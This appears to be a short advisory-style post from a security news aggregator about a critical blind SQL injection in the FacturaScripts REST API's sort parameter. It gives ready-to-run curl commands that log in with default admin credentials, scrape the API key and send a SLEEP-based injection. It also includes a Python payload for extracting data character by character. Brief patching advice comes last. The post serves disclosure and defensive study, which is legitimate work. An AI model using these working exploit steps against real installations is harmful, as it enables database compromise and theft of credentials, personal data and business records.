Listen to this Post
The vulnerability exploits the `sort` parameter in the FacturaScripts REST API. In the legacy `ModelClass::getOrderBy()` method, user-supplied keys and values from the `$order` array are directly concatenated into the SQL `ORDER BY` clause. In the modern `DbQuery::orderBy()` method, a check for parentheses (strpos($field, '(')) is used to allow SQL functions, but this fails to validate the content, allowing an attacker to inject arbitrary SQL code within those parentheses. An authenticated API user can send a malicious `sort` parameter containing a subquery with a time-delay function like SLEEP(), enabling Blind SQL Injection for data exfiltration.
Platform: FacturaScripts
Version: All versions
Vulnerability: SQL Injection
Severity: Critical
Date: 2024-10-29
Prediction: Patch pending
What Undercode Say:
Retrieve CSRF token and login TOKEN=$(curl -s -L -c cookies.txt "http://localhost:8091/login" | grep -Po 'name="multireqtoken" value="\K[^"]+' | head -n 1) curl -s -b cookies.txt -c cookies.txt -X POST "http://localhost:8091/login" -d "fsNick=admin" -d "fsPassword=admin" -d "action=login" -d "multireqtoken=$TOKEN" Extract API key using its ID API_ID=$(curl -s -b cookies.txt "http://localhost:8091/EditSettings?activetab=ListApiKey" | grep -Po 'EditApiKey\?code=\K\d+' | head -n 1) API_KEY=$(curl -s -b cookies.txt "http://localhost:8091/EditApiKey?code=$API_ID" | grep -Po 'name="apikey" value="\K[^"]+' | head -n 1) Time-based SQLi verification time curl -g -s -H "X-Auth-Token: $API_KEY" "http://localhost:8091/api/3/users?limit=1&sort[nick,(SELECT(SLEEP(3)))]=ASC"
Python exploitation snippet
payload = f"(SELECT IF(BINARY SUBSTRING(({query}),{i},1)='{char}',SLEEP(2),nick))"
elapsed = time_based_sqli(api_key, payload)
How Exploit:
1. Obtain valid API token.
2. Craft HTTP request with malicious `sort` parameter.
3. Use time-based blind SQLi for data extraction.
Protection from this CVE:
1. Implement strict column whitelist validation.
2. Use database escaping functions (`escapeColumn()`).
3. Apply query builder pattern.
Impact:
Complete database compromise.
Credential and PII theft.
Business data exfiltration.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

